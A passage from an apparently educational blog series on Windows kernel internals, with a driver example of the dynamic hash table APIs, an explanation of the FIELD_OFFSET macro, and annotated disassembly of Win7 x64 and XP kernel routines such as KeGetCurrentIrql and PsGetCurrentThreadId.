<span style="font-family: Courier New, Courier, monospace;">After setting bit ten to fifteen, the longest run of clear bits is at position 15 size 33</span><br />
<span style="font-family: Courier New, Courier, monospace;">The number of clear bits is: 43</span><br />
<span style="font-family: Courier New, Courier, monospace;">Are bits from 30 to 35 clear? 1 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Are bits from 30 to 40 clear? 0 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">This, instead, is an example of code that uses hash table APIs.</span><br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
UNREFERENCED_PARAMETER(DriverObject);
DbgPrint("Unload routine\n");
}
NTSTATUS
DriverEntry(
__in PDRIVER_OBJECT DriverObject,
__in PUNICODE_STRING RegistryPath
)
{
RTL_DYNAMIC_HASH_TABLE *hash_table;
// Unlike the generic table, the dynamic hash table does not copy entries:
// it links the caller's RTL_DYNAMIC_HASH_TABLE_ENTRY structures into its
// buckets, so they must stay valid for as long as they are in the table.
RTL_DYNAMIC_HASH_TABLE_ENTRY entry1, entry2, entry3, *result_hash;
RTL_DYNAMIC_HASH_TABLE_CONTEXT context;
ULONG sig = 1234;
BOOLEAN ret_val;
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Driver started\n");
DriverObject->DriverUnload = &MyUnload;
// A non-NULL *HashTable tells RtlCreateHashTable to use this caller-supplied
// memory for the table header rather than allocating its own.
hash_table = ExAllocatePoolWithTag(NonPagedPool, sizeof(RTL_DYNAMIC_HASH_TABLE), 'tag4');
if(hash_table == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
ret_val = RtlCreateHashTable(&hash_table, 0, 0);
DbgPrint("Create hashtable returned %08x\n", ret_val);
if(ret_val == FALSE)
{
ExFreePoolWithTag(hash_table, 'tag4');
return STATUS_INSUFFICIENT_RESOURCES;
}
DbgPrint("Entry1 address: %08x Entry2 address: %08x Entry3 address: %08x\n", &entry1, &entry2, &entry3);
RtlInitHashTableContext(&context);
// Note: the Signature passed to RtlInsertEntryHashTable is the address of
// "sig" (cast to ULONG_PTR), not its value, and the routine stores that
// signature into Entry->Signature, overwriting the value assigned just
// before. All three entries therefore end up with the same signature.
InitializeListHead(&(entry1.Linkage));
entry1.Signature = sig;
ret_val = RtlInsertEntryHashTable(hash_table, &entry1, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 1 returned %08x\n", ret_val);
InitializeListHead(&(entry2.Linkage));
entry2.Signature = sig;
ret_val = RtlInsertEntryHashTable(hash_table, &entry2, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 2 returned %08x\n", ret_val);
InitializeListHead(&(entry3.Linkage));
entry3.Signature = sig + 3;
ret_val = RtlInsertEntryHashTable(hash_table, &entry3, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 3 returned %08x\n", ret_val);
// The lookup returns one of the entries carrying this signature (entry3 in
// the run shown below); dereferencing the stored signature as a pointer
// reads back the value of "sig", i.e. 1234.
result_hash = RtlLookupEntryHashTable(hash_table, (ULONG_PTR)&sig, &context);
if(result_hash != NULL)
DbgPrint("Lookup hashtable returned entry at address %08x sig: %d \n", result_hash, *(ULONG*)(result_hash->Signature) );
else
DbgPrint("Lookup hashtable found no entry\n");
ret_val = RtlRemoveEntryHashTable(hash_table, &entry1, &context);
DbgPrint("Remove hashtable returned %08x\n", ret_val);
// RtlDeleteHashTable only releases the table's own bucket storage, so the
// remaining entries are removed first; the context is released once it is
// no longer needed.
RtlRemoveEntryHashTable(hash_table, &entry2, NULL);
RtlRemoveEntryHashTable(hash_table, &entry3, NULL);
RtlReleaseHashTableContext(&context);
RtlDeleteHashTable(hash_table);
ExFreePoolWithTag(hash_table, 'tag4');
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br />It produces the following output:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Driver started</span><br />
<span style="font-family: Courier New, Courier, monospace;">Create hashtable returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Entry1 address: 031667f0 Entry2 address: 03166808 Entry3 address: 03166820</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 1 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 2 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 3 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Lookup hashtable returned entry at address 03166820 sig: 1234 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Remove hashtable returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>8) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">FIELD_OFFSET is defined in ntdef.h as:</span><br />
<pre><span style="font-family: Courier New, Courier, monospace;">#define FIELD_OFFSET(type, field) ((LONG)(LONG_PTR)&(((type *)0)->field))</span></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The macro casts the number "0" to a pointer of type "type" (e.g. KPCR, or any other structure). Then it takes the field "field" of the structure through this pointer, which translates into adding a delta (the offset of "field" within the structure) to the pointer. The "&" operator retrieves the address of the field itself, so no memory is read through the null pointer, only an address is computed; and since the pointer to the structure is 0, the whole operation simply yields the address 0 + delta, that is, delta. This value is finally cast to LONG_PTR (an integer type as wide as a pointer, not a pointer to a long) and then to LONG, which is the result of the macro.</span></div>
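<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To see the macro at work outside the kernel, here is an added example (not code from the original post) that takes the ntdef.h definition above, applies it to a constructed structure with an embedded LIST_ENTRY, and goes one step further than the post by pairing it with the inverse macro, CONTAINING_RECORD, which subtracts the same delta to get from a linkage field back to its parent record. LONG and LONG_PTR are typedef'd locally so that it compiles with any C compiler, and MY_RECORD is a hypothetical structure, not a kernel one.</span></div>

```c
/* Added example (not from the original post): FIELD_OFFSET as defined in
 * ntdef.h, exercised in user-mode C on a constructed structure. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Local stand-ins for the Windows types: on Windows LONG is a 32-bit integer
 * and LONG_PTR an integer as wide as a pointer. */
typedef long     LONG;
typedef intptr_t LONG_PTR;

/* Verbatim from the post: take a null pointer of the requested type, address
 * its field, and read the resulting "address" back as an integer: 0 + delta. */
#define FIELD_OFFSET(type, field) ((LONG)(LONG_PTR)&(((type *)0)->field))

/* The inverse operation, used throughout the kernel for embedded list links:
 * given the address of a field, subtract its offset to reach the parent. */
#define CONTAINING_RECORD(address, type, field) \
    ((type *)((char *)(address) - FIELD_OFFSET(type, field)))

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Hypothetical driver-style record with a linkage field in the middle, so
 * that the offsets are not simply 0 and padding matters. */
typedef struct _MY_RECORD {
    uint32_t   Code;
    uint8_t    Flags;     /* followed by padding up to pointer alignment */
    LIST_ENTRY Linkage;
    uint64_t   Value;
} MY_RECORD;

/* Offsets computed with the ntdef.h macro. */
long offset_of_linkage(void) { return FIELD_OFFSET(MY_RECORD, Linkage); }
long offset_of_value(void)   { return FIELD_OFFSET(MY_RECORD, Value); }

/* Cross-check against the standard offsetof: the "null pointer" trick gives
 * the same answer for every field, padding included. */
int macro_matches_offsetof(void) {
    return FIELD_OFFSET(MY_RECORD, Code)    == (long)offsetof(MY_RECORD, Code)
        && FIELD_OFFSET(MY_RECORD, Flags)   == (long)offsetof(MY_RECORD, Flags)
        && FIELD_OFFSET(MY_RECORD, Linkage) == (long)offsetof(MY_RECORD, Linkage)
        && FIELD_OFFSET(MY_RECORD, Value)   == (long)offsetof(MY_RECORD, Value);
}

/* Round trip: from a record take the address of its Linkage (what a list
 * would actually hold), recover the record from it and read Code back. */
uint32_t code_via_linkage(uint32_t code) {
    MY_RECORD rec = { code, 0, { NULL, NULL }, 0 };
    LIST_ENTRY *link = &rec.Linkage;
    MY_RECORD *back = CONTAINING_RECORD(link, MY_RECORD, Linkage);
    return back->Code;
}

int main(void) {
    printf("Linkage offset: %ld, Value offset: %ld, agree with offsetof: %d\n",
           offset_of_linkage(), offset_of_value(), macro_matches_offsetof());
    printf("Code recovered through Linkage: %u\n", code_via_linkage(42));
    return 0;
}
```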
<span style="font-family: Verdana, sans-serif;">
</span>
<br />
<div>
<div>
<span style="font-family: Verdana, sans-serif;"><b>9) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Taken from Win7 x64:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ExGetCurrentProcessorCpuUsage proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rdx, gs:20h GS = KPCR, +0x020 CurrentPrcb : Ptr64 _KPRCB</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rdx+18h] rdx = KPRCB, +0x018 IdleThread : Ptr64 _KTHREAD</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, [rdx+4708h] rdx = KPRCB, +0x4708 UserTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>add<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, [rdx+4704h] rdx = KPRCB, +0x4704 KernelTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rax+284h] rax = KTHREAD, +0x284 KernelTime (of idle thread)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xor<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>imul<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 64h KTHREAD.KernelTime * 100 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>div<span class="Apple-tab-span" style="white-space: pre;"> </span>r8 divided by KPRCB.UserTime + KPRCB.KernelTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, 64h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sub<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, eax subtract the result of the division from 100</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>[rcx], edx store result in [rcx]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ExGetCurrentProcessorCpuUsage endp</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This function calculates the percentage of CPU usage time by using the following formula:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> x = (ETHREAD.KernelTime * 100) / (KPRCB.UserTime + KPRCB.KernelTime)</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">which can be derived from a simple proportion:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> (KPRCB.UserTime + KPRCB.KernelTime) : 100 = ETHREAD.KernelTime : x</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><i>where (KPRCB.UserTime + KPRCB.KernelTime) is the total CPU usage time and ETHREAD.KernelTime is the idle thread usage time.</i></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If x is the percentage of time the CPU spent in the idle thread, the returned value is 100 - x (time spent outside idle, that is, time during which the CPU was busy).</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The XP x86 version works in a similar way.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="font-family: Verdana, sans-serif;">
<b>10) </b><br />
<br />
Taken from Win7 x64:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">KeGetCurrentIrql proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, cr8</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">KeGetCurrentIrql endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The api simply gets the current IRQL from register CR8, which on x64 is a shadow register for the Task Priority Register (TPR) from the LAPIC chip.</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
The same api taken from Xp x86 shows a slightly different implementation:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">hal!KeGetCurrentIrql:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12e8 a18000feff mov eax,dword ptr ds:[<b>FFFE0080h</b>]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12ed c1e804 shr eax,4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12f0 0fb68088c06d80 movzx eax,byte ptr hal!HalpVectorToIRQL (806dc088)[eax]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12f7 c3 ret</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
In this system (as in most systems), the LAPIC data is mapped at address 0xFFFE0000, and offset 0x80 contains the TPR. The api reads the value of that register, which is normally just a byte, discards the lowest 4 bits, and uses the remaining ones as an index into the HalpVectorToIRQL array. Basically, it translates the hardware TPR to a software IRQL. As a test, I can use the debugger to see the value of the TPR:</div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> dd FFFE0080</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">fffe0080 <b>000000d1 </b>00000000 000000d1 00000000</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
Removing the lowest 4 bits, the remaining number is 0x0D, which can be used as an index in the HalpVectorToIRQL array:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> db HalpVectorToIRQL </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806dc088 00 ff ff 01 02 ff 05 06-07 08 09 0a 1b <b>1c </b>1d 1e </span></div>
</div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
Thus the current IRQL is 0x1C (CLOCK2_LEVEL).</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<div style="font-family: Verdana, sans-serif;">
<b>11) </b><br />
<br />
Taken from Win7 x64:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PEPROCESS IoThreadToProcess(_In_ PETHREAD Thread);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>IoThreadToProcess</b> proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+210h] ETHREAD.Tcb.Process (pointer to EPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">IoThreadToProcess endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api returns the pointer to EPROCESS that is stored in the ETHREAD whose pointer is passed as an argument.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadProcessId</b> proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+3B8h] ETHREAD.Cid.UniqueProcess</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadProcessId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api returns the PID stored in the ETHREAD whose pointer is passed as an argument.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">BOOLEAN PsIsSystemThread(_In_ PETHREAD Thread);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsIsSystemThread </b>proc near<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rcx+4Ch] ETHREAD.Tcb.MiscFlags (contains several flags)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>shr<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, 0Dh 0d = 13 = SystemThread : Pos 13, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>and<span class="Apple-tab-span" style="white-space: pre;"> </span>al, 1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsIsSystemThread endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
This api accesses the MiscFlags field of the KTHREAD structure from the ETHREAD whose pointer is passed as an argument. This field is in the form of a bitfield and contains the following bits/flags:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c KernelStackResident : Pos 0, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ReadyTransition : Pos 1, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ProcessReadyQueue : Pos 2, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c WaitNext : Pos 3, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c SystemAffinityActive : Pos 4, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c Alertable : Pos 5, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c GdiFlushActive : Pos 6, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c UserStackWalkActive : Pos 7, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ApcInterruptRequest : Pos 8, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ForceDeferSchedule : Pos 9, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c QuantumEndMigrate : Pos 10, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c UmsDirectedSwitchEnable : Pos 11, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c TimerActive : Pos 12, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> <b>+0x04c SystemThread : Pos 13, 1 Bit</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c Reserved : Pos 14, 18 Bits</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c MiscFlags : Int4B</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
Thus, the flag at position 13 is the one being returned; it corresponds to the "SystemThread" flag.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">HANDLE PsGetCurrentThreadId(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadId </b>proc near<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread (pointer to ETHREAD)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+3C0h] CurrentThread.UniqueThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api gets the pointer to the current ETHREAD from the KPCR structure, from which it returns the TID.</div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The next apis are similar to this one.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadPreviousMode </b>proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>al, [rax+1F6h] CurrentThread.PreviousMode</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadPreviousMode endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadProcessId </b>proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+3B8h] CurrentThread.Cid.UniqueProcess</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadStackBase </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+278h] CurrentThread.StackBase</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadStackBase endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadWin32Thread </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+270h] CurrentThread.Win32Thread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadWin32Thread endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadId<span class="Apple-tab-span" style="white-space: pre;"> </span></b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+3C0h] ETHREAD.UniqueThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadId<span class="Apple-tab-span" style="white-space: pre;"> </span>endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
This API returns the TID from the ETHREAD whose pointer is passed as a parameter.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadSessionId </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, [rcx+210h] ETHREAD.Tcb.Process (points to a KPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jmp<span class="Apple-tab-span" style="white-space: pre;"> </span>MmGetSessionId</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadSessionId endp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
